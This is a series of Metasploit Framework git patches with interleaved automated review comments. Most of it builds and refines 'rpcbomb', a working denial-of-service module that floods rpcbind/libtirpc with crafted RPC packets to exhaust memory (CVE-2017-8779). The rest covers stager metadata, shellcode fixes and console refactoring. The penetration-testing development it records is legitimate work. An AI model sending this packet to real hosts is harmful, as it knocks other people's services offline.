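Review bot: in the `@@ -44,22 +54,26 @@` hunk the `import ssl,socket,struct...` line still decides whether to import `time` from `datastore['StagerRetryWait']`, while the `time.sleep(...)` emitted a few lines later now comes from `opts[:retry_wait]`; a caller that builds conf without going through generate_stage, or with a differing value, produces a stager that raises NameError on the target. Derive both from the same source: `cmd = "import ssl,socket,struct#{opts[:retry_wait].to_i > 0 ? ',time' : ''}\n"`. Likewise `if opts[:retry_count]>0` raises NoMethodError when the key is absent; use `opts[:retry_count].to_i > 0`, and the unused loop variable reads better as `for _ in range(...)`. The method body continues beyond the hunk.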
diff --git a/modules/payloads/stagers/python/reverse_tcp_ssl.rb b/modules/payloads/stagers/python/reverse_tcp_ssl.rb index d564bec8cb..b2b94fe748 100644 --- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb +++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl' module MetasploitModule - CachedSize = 378 + CachedSize = 470 include Msf::Payload::Stager include Msf::Payload::Python::ReverseTcpSsl From 737f7452ced9e133f4311b761ba2d99eef0033f3 Mon Sep 17 00:00:00 2001 From: tkmru Date: Sun, 4 Jun 2017 04:42:45 +0900 Subject: [PATCH 21/38] add my name to author --- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 655f7f4ec9..89fbded574 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Reverse TCP Stager', 'Description' => 'Connect back to the attacker', - 'Author' => [ 'skape', 'egypt' ], + 'Author' => [ 'skape', 'egypt', 'tkmru' ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, From f17b28930dd926b93915a115f1117825f4c594db Mon Sep 17 00:00:00 2001 From: RaMMicHaeL Date: Sun, 4 Jun 2017 13:18:50 +0300 Subject: [PATCH 22/38] Update executex64.asm --- .../source/shellcode/windows/x86/src/migrate/executex64.asm | 3 +++ 1 file changed, 3 insertions(+) diff --git a/external/source/shellcode/windows/x86/src/migrate/executex64.asm b/external/source/shellcode/windows/x86/src/migrate/executex64.asm index a3f2777fde..e4af580fe0 100644 --- a/external/source/shellcode/windows/x86/src/migrate/executex64.asm +++ b/external/source/shellcode/windows/x86/src/migrate/executex64.asm 
@@ -40,6 +40,9 @@ delta: call go_all_native ; perform the transition into native x64 and return here when done. + mov ax, ds ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484 + mov ss, ax ; found and fixed by ReWolf, incorporated by RaMMicHaeL + add esp, (8+4+8) ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64 pop edi ; restore the clobbered registers pop esi ; From 5f10e63923532293f68279e99cfff567c40caea2 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 5 Jun 2017 08:43:16 -0500 Subject: [PATCH 23/38] bump payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 3907842107..ab6ce112f1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -15,7 +15,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.29) + metasploit-payloads (= 1.2.32) metasploit_data_models metasploit_payloads-mettle (= 0.1.9) msgpack @@ -195,7 +195,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.29) + metasploit-payloads (1.2.32) metasploit_data_models (2.0.14) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 5670325907..f4133668e0 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -68,7 +68,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.29' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.32' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9' # Needed by msfgui and other rpc components From a571834c4d09997c719174977c199e79ee5c38d2 Mon Sep 17 00:00:00 2001 
From: Pearce Barry Date: Mon, 5 Jun 2017 10:23:39 -0500 Subject: [PATCH 24/38] Initial commit of rpcbomb DoS aux module. This just brings the code in as-in, next step is to update to use our mixins and such. --- modules/auxiliary/dos/rpc/rpcbomb.rb | 72 ++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 modules/auxiliary/dos/rpc/rpcbomb.rb diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb new file mode 100644 index 0000000000..8f8c50647f --- /dev/null +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb 
@@ -0,0 +1,72 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+ include Msf::Auxiliary::Dos
+ # include Exploit::Remote::Udp
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
+ 'Description' => %q{
+ This module XXX.
+ },
+ 'Author' =>
+ [
+ 'guidovranken', # original code
+ 'Pearce Barry ' # Metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' => [
+ [ 'CVE', '2017-8779' ],
+ [ 'BID', '98325' ],
+ [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ]
+ ],
+ 'Disclosure Date' => 'May 03 2017'))
+
+ register_options([
+ Opt::RPORT(111),
+ OptAddress.new('RHOST', [true, 'RPC server target']),
+ OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate'])
+ ])
+ end
+
+
+
+ def run
+ require 'socket'
+
+ pkt = [0].pack('N') # xid
+ pkt << [0].pack('N') # message type CALL
+ pkt << [2].pack('N') # RPC version 2
+ pkt << [100000].pack('N') # Program
+ pkt << [4].pack('N') # Program version
+ pkt << [9].pack('N') # Procedure
+ pkt << [0].pack('N') # Credentials AUTH_NULL
+ pkt << [0].pack('N') # Credentials length 0
+ pkt << [0].pack('N') # Credentials AUTH_NULL
+ pkt << [0].pack('N') # Credentials length 0
+ pkt << [0].pack('N') # Program: 0
+ pkt << [0].pack('N') # Ver
+ pkt << [4].pack('N') # Proc
+ pkt << [4].pack('N') # Argument length
+ pkt << [datastore['ALLOCSIZE']].pack('N') # Payload
+
+ s = UDPSocket.new
+ s.send(pkt, 0, datastore['RHOST'], datastore['RPORT'])
+
+ sleep 1.5
+
+ begin
+ s.recvfrom_nonblock(9000)
+ rescue
+ print_error("No response from server received.")
+ return
+ end
+
+ print_good("Allocated #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}")
+ end
+end
From 8c39c92245b1b1136bf3be420263872ebc4a2060 Mon Sep 17 00:00:00 2001
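Review bot: The `UDPSocket` created in `run` is never closed, so each run leaks a descriptor until the process exits; wrapping the send/receive in `begin … ensure s.close end` fixes that. The bare `rescue` around `recvfrom_nonblock` also treats every StandardError — including `IO::WaitReadable`, which only means nothing has arrived yet — as "no response", so a genuine socket failure prints the same message and is lost; `rescue IO::WaitReadable` for the expected case and let other errors surface. `require 'socket'` belongs at the top of the file rather than inside `run`, where it re-runs on every invocation.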
From: Pearce Barry
Date: Mon, 5 Jun 2017 11:27:13 -0500
Subject: [PATCH 25/38] Add description and loop capability.
---
 modules/auxiliary/dos/rpc/rpcbomb.rb | 16 ++++++++++++----
 1 file changed, 12 insertions(+), 4 deletions(-)
diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb
index 8f8c50647f..b08bab58b5 100644
--- a/modules/auxiliary/dos/rpc/rpcbomb.rb
+++ b/modules/auxiliary/dos/rpc/rpcbomb.rb
@@ -12,7 +12,10 @@ class MetasploitModule < Msf::Auxiliary
 super(update_info(info,
 'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc',
 'Description' => %q{
- This module XXX.
+ This module exploits a vulnerability in certain versions of
+ rpcbind, LIBTIRPC, and NTIRPC, allowing an attacker to trigger
+ large (and never freed) memory allocations for XDR strings on
+ the target.
 },
 'Author' =>
 [
@@ -30,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
 register_options([
 Opt::RPORT(111),
 OptAddress.new('RHOST', [true, 'RPC server target']),
- OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate'])
+ OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']),
+ OptInt.new('COUNT', [false, "Number of intervals to loop",1])
 ])
 end
@@ -56,7 +60,11 @@ class MetasploitModule < Msf::Auxiliary
 pkt << [datastore['ALLOCSIZE']].pack('N') # Payload
 s = UDPSocket.new
- s.send(pkt, 0, datastore['RHOST'], datastore['RPORT'])
+ count = 0
+ while count < datastore['COUNT'] do
+ s.send(pkt, 0, datastore['RHOST'], datastore['RPORT'])
+ count += 1
+ end
 sleep 1.5
@@ -67,6 +75,6 @@ class MetasploitModule < Msf::Auxiliary
 return
 end
- print_good("Allocated #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}")
+ print_good("Completed #{datastore['COUNT']} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}")
 end
 end
From a5805a55dc6e10d15b7ffec791520b94d6b96081 Mon Sep 17 00:00:00 2001
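Review bot: The new `COUNT` option is described as "Number of intervals to loop", but the loop added in `run` sends one datagram per iteration with no interval between them, so the description should say what it actually counts, e.g. `OptInt.new('COUNT', [true, 'Number of packets to send', 1])`. The hand-rolled counter `count = 0; while count < datastore['COUNT'] do … count += 1; end` is the idiomatic `datastore['COUNT'].times { s.send(pkt, 0, datastore['RHOST'], datastore['RPORT']) }`. Because `COUNT` is marked optional, a caller that unsets it can hand `nil` to `<` and raise; since it has a default, marking it required costs nothing and removes that path. `run` begins and ends outside these hunks.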
From: Brent Cook Date: Mon, 5 Jun 2017 12:35:54 -0500 Subject: [PATCH 26/38] make this a UDPScanner, rewrite --- modules/auxiliary/dos/rpc/rpcbomb.rb | 65 +++++++++++++--------------- 1 file changed, 29 insertions(+), 36 deletions(-) diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb index b08bab58b5..5731e9eb61 100644 --- a/modules/auxiliary/dos/rpc/rpcbomb.rb +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -6,7 +6,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos - # include Exploit::Remote::Udp + include Msf::Auxiliary::UDPScanner def initialize(info={}) super(update_info(info, 
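Review bot: `Msf::Auxiliary::UDPScanner` is included here without `Msf::Auxiliary::Report`; if the scanner mixin's run loop reaches a report helper — which the follow-up commit's "add missing report mixin to avoid error" suggests it does — this revision raises `NoMethodError` at run time. Adding `include Msf::Auxiliary::Report` next to the Dos include keeps the module self-contained rather than relying on the next patch. The enclosing class continues outside the hunk.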
@@ -32,49 +32,42 @@ class MetasploitModule < Msf::Auxiliary
 register_options([
 Opt::RPORT(111),
- OptAddress.new('RHOST', [true, 'RPC server target']),
- OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']),
- OptInt.new('COUNT', [false, "Number of intervals to loop",1])
+ OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate', 1000000]),
+ OptInt.new('COUNT', [false, "Number of intervals to loop", 1000000])
 ])
 end
+ def scan_host(ip)
+ pkt = [
+ 0, # xid
+ 0, # message type CALL
+ 2, # RPC version 2
+ 100000, # Program
+ 4, # Program version
+ 9, # Procedure
+ 0, # Credentials AUTH_NULL
+ 0, # Credentials length 0
+ 0, # Credentials AUTH_NULL
+ 0, # Credentials length 0
+ 0, # Program: 0
+ 0, # Ver
+ 4, # Proc
+ 4, # Argument length
+ datastore['ALLOCSIZE'] # Payload
+ ].pack('N*')
-
-
- def run
- require 'socket'
-
- pkt = [0].pack('N') # xid
- pkt << [0].pack('N') # message type CALL
- pkt << [2].pack('N') # RPC version 2
- pkt << [100000].pack('N') # Program
- pkt << [4].pack('N') # Program version
- pkt << [9].pack('N') # Procedure
- pkt << [0].pack('N') # Credentials AUTH_NULL
- pkt << [0].pack('N') # Credentials length 0
- pkt << [0].pack('N') # Credentials AUTH_NULL
- pkt << [0].pack('N') # Credentials length 0
- pkt << [0].pack('N') # Program: 0
- pkt << [0].pack('N') # Ver
- pkt << [4].pack('N') # Proc
- pkt << [4].pack('N') # Argument length
- pkt << [datastore['ALLOCSIZE']].pack('N') # Payload
-
- s = UDPSocket.new
+ s = udp_socket(ip, datastore['RPORT'])
 count = 0
 while count < datastore['COUNT'] do
- s.send(pkt, 0, datastore['RHOST'], datastore['RPORT'])
+ begin
+ s.send(pkt, 0)
+ rescue ::Errno::ENOBUFS, ::Rex::ConnectionError, ::Errno::ECONNREFUSED
+ vprint_error("Host #{ip} unreachable")
+ break
+ end
 count += 1
 end
- sleep 1.5
-
- begin
- s.recvfrom_nonblock(9000)
- rescue
- print_error("No response from server received.")
- return
- end
-
- print_good("Completed #{datastore['COUNT']} loop(s) of allocating #{datastore['ALLOCSIZE']} 
bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}")
+ vprint_good("Completed #{count} loop(s) of allocating #{datastore['ALLOCSIZE']} bytes on host #{ip}:#{datastore['RPORT']}")
 end
 end
From bc3b88375803c5a4c5c4ff3c9b86131b69a53806 Mon Sep 17 00:00:00 2001
From: Pearce Barry
Date: Mon, 5 Jun 2017 13:49:59 -0500
Subject: [PATCH 27/38] Add docs, fix typo, add missing report mixin to avoid error.
---
 .../auxiliary_scanner_template.erb | 2 +-
 .../modules/auxiliary/dos/rpc/rpcbomb.md | 29 +++++++++++++++++++
 modules/auxiliary/dos/rpc/rpcbomb.rb | 1 +
 3 files changed, 31 insertions(+), 1 deletion(-)
 create mode 100644 documentation/modules/auxiliary/dos/rpc/rpcbomb.md
diff --git a/data/markdown_doc/auxiliary_scanner_template.erb b/data/markdown_doc/auxiliary_scanner_template.erb
index 409a7c9970..e7adc934f9 100644
--- a/data/markdown_doc/auxiliary_scanner_template.erb
+++ b/data/markdown_doc/auxiliary_scanner_template.erb
@@ -8,7 +8,7 @@ msf <%= mod.type %>(<%= mod.shortname %>) > set RHOSTS ip-range
 msf <%= mod.type %>(<%= mod.shortname %>) > exploit
 ```
-Other examples of setting the RHSOTS option:
+Other examples of setting the RHOSTS option:
 Example 1:
diff --git a/documentation/modules/auxiliary/dos/rpc/rpcbomb.md b/documentation/modules/auxiliary/dos/rpc/rpcbomb.md
new file mode 100644
index 0000000000..3d656d8ca9
--- /dev/null
+++ b/documentation/modules/auxiliary/dos/rpc/rpcbomb.md
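Review bot: `datastore['ALLOCSIZE']` is packed with `'N*'`, which silently truncates to 32 bits, so a value above `0xffffffff` puts a different length on the wire than the operator configured; `scan_host` should reject it before building `pkt`, e.g. `fail_with(Failure::BadConfig, 'ALLOCSIZE must fit in 32 bits') if datastore['ALLOCSIZE'] > 0xffffffff`. The socket returned by `udp_socket` is not closed when the loop ends; unless the mixin owns its lifetime (worth confirming), an `ensure s.close` around the `while` loop keeps one descriptor per scanned host from lingering. `COUNT` is still described as "Number of intervals to loop" although it now counts datagrams per host, and both it and `ALLOCSIZE` default to `1000000`; `'Number of packets to send per host'` says what the option does and makes that default easier to judge. `scan_host` is fully inside the hunk.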
@@ -0,0 +1,29 @@ +## Vulnerable Application + +This module [exploits a vulnerability](http://openwall.com/lists/oss-security/2017/05/03/12) in rpcbind through 0.2.4, +LIBTIRPC through 1.0.1 and 1.0.2-rc through 1.0.2-rc3, and NTIRPC through 1.4.3. + +Exploiting this vulnerability allows an attacker to trigger large (and never freed) memory allocations for XDR strings on the target. + +## Verification Steps + +1. Start msfconsole +1. Do: `use auxiliary/dos/rpc/rpcbomb` +1. Do: `set RHOSTS [IP]` +1. Do: `run` +1. Target should leak memory + +## Scenarios + +### rpcbind 0.2.3-0.2 on Ubuntu 16.04 (amd64) + +``` +msf > use auxiliary/dos/rpc/rpcbomb +msf auxiliary(rpcbomb) > set RHOSTS 10.0.2.7 +RHOSTS => 10.0.2.7 +msf auxiliary(rpcbomb) > run + +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(rpcbomb) > +``` diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb index 5731e9eb61..c88f03d693 100644 --- a/modules/auxiliary/dos/rpc/rpcbomb.rb +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -6,6 +6,7 @@ class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Dos + include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner def initialize(info={}) From f4013b02e14991154f8df10a11c800ab544359aa Mon Sep 17 00:00:00 2001 
From: darkbushido Date: Mon, 5 Jun 2017 14:19:18 -0500 Subject: [PATCH 28/38] renaming db_common to common this moves the following methods into common arg_host_range ( used in creds and db ) arg_port_range ( used in creds and db ) set_rhosts_from_addrs ( used in creds and db ) show_options ( used in jobs and modules ) --- lib/msf/ui/console/command_dispatcher.rb | 2 +- .../ui/console/command_dispatcher/common.rb | 147 ++++++++++++++++++ .../ui/console/command_dispatcher/creds.rb | 39 +---- lib/msf/ui/console/command_dispatcher/db.rb | 52 +------ .../console/command_dispatcher/db_common.rb | 57 ------- lib/msf/ui/console/command_dispatcher/jobs.rb | 1 + .../ui/console/command_dispatcher/modules.rb | 39 +---- 7 files changed, 155 insertions(+), 182 deletions(-) create mode 100644 lib/msf/ui/console/command_dispatcher/common.rb delete mode 100644 lib/msf/ui/console/command_dispatcher/db_common.rb diff --git a/lib/msf/ui/console/command_dispatcher.rb b/lib/msf/ui/console/command_dispatcher.rb index 32fea80cf8..6f4d05180d 100644 --- a/lib/msf/ui/console/command_dispatcher.rb +++ b/lib/msf/ui/console/command_dispatcher.rb @@ -1,5 +1,5 @@ # -*- coding: binary -*- - +require 'msf/ui/console/command_dispatcher/common' module Msf module Ui module Console diff --git a/lib/msf/ui/console/command_dispatcher/common.rb b/lib/msf/ui/console/command_dispatcher/common.rb new file mode 100644 index 0000000000..f9a5cc9201 --- /dev/null +++ b/lib/msf/ui/console/command_dispatcher/common.rb 
@@ -0,0 +1,147 @@ +# -*- coding: binary -*- + +require 'rexml/document' +require 'rex/parser/nmap_xml' +require 'msf/core/db_export' + +module Msf +module Ui +module Console +module CommandDispatcher + + # These are functions that are used in two or more command dispatchers. + +module Common + + # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+ + # + # @note This modifies +host_ranges+ in place + # + # @param arg [String] The thing to turn into a RangeWalker + # @param host_ranges [Array] The array of ranges to append + # @param required [Boolean] Whether an empty +arg+ should be an error + # @return [Boolean] true if parsing was successful or false otherwise + def arg_host_range(arg, host_ranges, required=false) + if (!arg and required) + print_error("Missing required host argument") + return false + end + begin + rw = Rex::Socket::RangeWalker.new(arg) + rescue + print_error("Invalid host parameter, #{arg}.") + return false + end + + if rw.valid? + host_ranges << rw + else + print_error("Invalid host parameter, #{arg}.") + return false + end + return true + end + + # + # Parse +arg+ into an array of ports and append the result into +port_ranges+ + # + # Returns true if parsing was successful or nil otherwise. + # + # NOTE: This modifies +port_ranges+ + # + def arg_port_range(arg, port_ranges, required=false) + if (!arg and required) + print_error("Argument required for -p") + return + end + begin + port_ranges << Rex::Socket.portspec_to_portlist(arg) + rescue + print_error("Invalid port parameter, #{arg}.") + return + end + return true + end + + # + # Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses + # + # This stores all the addresses to a temporary file and utilizes the + #
file:/tmp/filename
syntax to confer the addrs. +rhosts+ + # should be an Array. NOTE: the temporary file is *not* deleted + # automatically. + # + def set_rhosts_from_addrs(rhosts) + if rhosts.empty? + print_status("The list is empty, cowardly refusing to set RHOSTS") + return + end + if active_module + mydatastore = active_module.datastore + else + # if there is no module in use set the list to the global variable + mydatastore = self.framework.datastore + end + + if rhosts.length > 5 + # Lots of hosts makes 'show options' wrap which is difficult to + # read, store to a temp file + rhosts_file = Rex::Quickfile.new("msf-db-rhosts-") + mydatastore['RHOSTS'] = 'file:'+rhosts_file.path + # create the output file and assign it to the RHOSTS variable + rhosts_file.write(rhosts.join("\n")+"\n") + rhosts_file.close + else + # For short lists, just set it directly + mydatastore['RHOSTS'] = rhosts.join(" ") + end + + print_line "RHOSTS => #{mydatastore['RHOSTS']}" + print_line + end + + def show_options(mod) # :nodoc: + mod_opt = Serializer::ReadableText.dump_options(mod, ' ') + print("\nModule options (#{mod.fullname}):\n\n#{mod_opt}\n") if (mod_opt and mod_opt.length > 0) + + # If it's an exploit and a payload is defined, create it and + # display the payload's options + if (mod.exploit? and mod.datastore['PAYLOAD']) + p = framework.payloads.create(mod.datastore['PAYLOAD']) + + if (!p) + print_error("Invalid payload defined: #{mod.datastore['PAYLOAD']}\n") + return + end + + p.share_datastore(mod.datastore) + + if (p) + p_opt = Serializer::ReadableText.dump_options(p, ' ') + print("\nPayload options (#{mod.datastore['PAYLOAD']}):\n\n#{p_opt}\n") if (p_opt and p_opt.length > 0) + end + end + + # Print the selected target + if (mod.exploit? 
and mod.target) + mod_targ = Serializer::ReadableText.dump_exploit_target(mod, ' ') + print("\nExploit target:\n\n#{mod_targ}\n") if (mod_targ and mod_targ.length > 0) + end + + # Print the selected action + if mod.kind_of?(Msf::Module::HasActions) && mod.action + mod_action = Serializer::ReadableText.dump_module_action(mod, ' ') + print("\n#{mod.type.capitalize} action:\n\n#{mod_action}\n") if (mod_action and mod_action.length > 0) + end + + # Uncomment this line if u want target like msf2 format + #print("\nTarget: #{mod.target.name}\n\n") + end + + +end + +end +end +end +end diff --git a/lib/msf/ui/console/command_dispatcher/creds.rb b/lib/msf/ui/console/command_dispatcher/creds.rb index 0eba702caa..b715afd55b 100644 --- a/lib/msf/ui/console/command_dispatcher/creds.rb +++ b/lib/msf/ui/console/command_dispatcher/creds.rb @@ -3,7 +3,6 @@ require 'rexml/document' require 'rex/parser/nmap_xml' require 'msf/core/db_export' -require 'msf/ui/console/command_dispatcher/db_common' module Msf module Ui @@ -15,7 +14,7 @@ class Creds include Msf::Ui::Console::CommandDispatcher include Metasploit::Credential::Creation - include Msf::Ui::Console::CommandDispatcher::DbCommon + include Msf::Ui::Console::CommandDispatcher::Common # # The dispatcher's name. 
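Review bot: `arg_port_range` returns `nil` on its failure paths while the neighbouring `arg_host_range` returns `false`, and now that both live in `Common` callers will reasonably treat them alike; the two bare `return` statements in `arg_port_range` should be `return false`, with its header comment changed from "true if parsing was successful or nil otherwise" to "true or false". In `show_options`, the `if (p)` wrapper is dead because the `return` guard on `!p` just above already handled a falsy `p`, so the `p_opt` lines can be flattened into the enclosing `if`. The hunk holds the whole new file, so no definition is cut.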
@@ -53,39 +52,6 @@ class Creds
 true
 end
- #
- # Miscellaneous option helpers
- #
-
- # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+
- #
- # @note This modifies +host_ranges+ in place
- #
- # @param arg [String] The thing to turn into a RangeWalker
- # @param host_ranges [Array] The array of ranges to append
- # @param required [Boolean] Whether an empty +arg+ should be an error
- # @return [Boolean] true if parsing was successful or false otherwise
- def arg_host_range(arg, host_ranges, required=false)
- if (!arg and required)
- print_error("Missing required host argument")
- return false
- end
- begin
- rw = Rex::Socket::RangeWalker.new(arg)
- rescue
- print_error("Invalid host parameter, #{arg}.")
- return false
- end
-
- if rw.valid?
- host_ranges << rw
- else
- print_error("Invalid host parameter, #{arg}.")
- return false
- end
- return true
- end
-
 #
 # Can return return active or all, on a certain host or range, on a
 # certain port or range, and/or on a service name.
@@ -118,6 +84,9 @@ class Creds
 # TODO: this needs to be cleaned up to use the new syntax
 #
 def cmd_creds_help
+ require 'pry'
+ binding.pry
+
 print_line
 print_line "With no sub-command, list credentials. If an address range is"
 print_line "given, show only credentials with logins on hosts within that"
diff --git a/lib/msf/ui/console/command_dispatcher/db.rb b/lib/msf/ui/console/command_dispatcher/db.rb
index 960345afa9..64aa114fd0 100644
--- a/lib/msf/ui/console/command_dispatcher/db.rb
+++ b/lib/msf/ui/console/command_dispatcher/db.rb
@@ -3,7 +3,6 @@ require 'rexml/document'
 require 'rex/parser/nmap_xml'
 require 'msf/core/db_export'
-require 'msf/ui/console/command_dispatcher/db_common'
 module Msf
 module Ui
@@ -15,7 +14,7 @@ class Db
 require 'tempfile'
 include Msf::Ui::Console::CommandDispatcher
- include Msf::Ui::Console::CommandDispatcher::DbCommon
+ include Msf::Ui::Console::CommandDispatcher::Common
 #
 # The dispatcher's name.
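Review bot: The `@@ -118,6 +84,9 @@` hunk adds `require 'pry'` and `binding.pry` at the top of `cmd_creds_help`, which is leftover debugging: every `creds -h` would stop in an interactive REPL, and on installs without the pry gem it raises `LoadError` instead of printing help. Both lines (and the blank added after them) should be removed before merge; they are unrelated to the rename this commit describes. `cmd_creds_help` continues past the end of the hunk.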
@@ -1809,55 +1808,6 @@ class Db # Miscellaneous option helpers # - # Parse +arg+ into a {Rex::Socket::RangeWalker} and append the result into +host_ranges+ - # - # @note This modifies +host_ranges+ in place - # - # @param arg [String] The thing to turn into a RangeWalker - # @param host_ranges [Array] The array of ranges to append - # @param required [Boolean] Whether an empty +arg+ should be an error - # @return [Boolean] true if parsing was successful or false otherwise - def arg_host_range(arg, host_ranges, required=false) - if (!arg and required) - print_error("Missing required host argument") - return false - end - begin - rw = Rex::Socket::RangeWalker.new(arg) - rescue - print_error("Invalid host parameter, #{arg}.") - return false - end - - if rw.valid? - host_ranges << rw - else - print_error("Invalid host parameter, #{arg}.") - return false - end - return true - end - - # - # Parse +arg+ into an array of ports and append the result into +port_ranges+ - # - # Returns true if parsing was successful or nil otherwise. - # - # NOTE: This modifies +port_ranges+ - # - def arg_port_range(arg, port_ranges, required=false) - if (!arg and required) - print_error("Argument required for -p") - return - end - begin - port_ranges << Rex::Socket.portspec_to_portlist(arg) - rescue - print_error("Invalid port parameter, #{arg}.") - return - end - return true - end # # Takes +host_ranges+, an Array of RangeWalkers, and chunks it up into diff --git a/lib/msf/ui/console/command_dispatcher/db_common.rb b/lib/msf/ui/console/command_dispatcher/db_common.rb deleted file mode 100644 index 68f789d646..0000000000 --- a/lib/msf/ui/console/command_dispatcher/db_common.rb +++ /dev/null 
@@ -1,57 +0,0 @@ -# -*- coding: binary -*- - -require 'rexml/document' -require 'rex/parser/nmap_xml' -require 'msf/core/db_export' - -module Msf -module Ui -module Console -module CommandDispatcher - -module DbCommon - - # - # Set RHOSTS in the +active_module+'s (or global if none) datastore from an array of addresses - # - # This stores all the addresses to a temporary file and utilizes the - #
file:/tmp/filename
syntax to confer the addrs. +rhosts+ - # should be an Array. NOTE: the temporary file is *not* deleted - # automatically. - # - def set_rhosts_from_addrs(rhosts) - if rhosts.empty? - print_status("The list is empty, cowardly refusing to set RHOSTS") - return - end - if active_module - mydatastore = active_module.datastore - else - # if there is no module in use set the list to the global variable - mydatastore = self.framework.datastore - end - - if rhosts.length > 5 - # Lots of hosts makes 'show options' wrap which is difficult to - # read, store to a temp file - rhosts_file = Rex::Quickfile.new("msf-db-rhosts-") - mydatastore['RHOSTS'] = 'file:'+rhosts_file.path - # create the output file and assign it to the RHOSTS variable - rhosts_file.write(rhosts.join("\n")+"\n") - rhosts_file.close - else - # For short lists, just set it directly - mydatastore['RHOSTS'] = rhosts.join(" ") - end - - print_line "RHOSTS => #{mydatastore['RHOSTS']}" - print_line - end - - -end - -end -end -end -end diff --git a/lib/msf/ui/console/command_dispatcher/jobs.rb b/lib/msf/ui/console/command_dispatcher/jobs.rb index ac184be4e6..6ddb848068 100644 --- a/lib/msf/ui/console/command_dispatcher/jobs.rb +++ b/lib/msf/ui/console/command_dispatcher/jobs.rb @@ -16,6 +16,7 @@ module Msf # class Jobs include Msf::Ui::Console::CommandDispatcher + include Msf::Ui::Console::CommandDispatcher::Common @@handler_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help Banner"], diff --git a/lib/msf/ui/console/command_dispatcher/modules.rb b/lib/msf/ui/console/command_dispatcher/modules.rb index 09ac5b9233..43a890a686 100644 --- a/lib/msf/ui/console/command_dispatcher/modules.rb +++ b/lib/msf/ui/console/command_dispatcher/modules.rb @@ -13,6 +13,7 @@ module Msf class Modules include Msf::Ui::Console::CommandDispatcher + include Msf::Ui::Console::CommandDispatcher::Common # Constant for a retry timeout on using modules before they're loaded CMD_USE_TIMEOUT = 3 
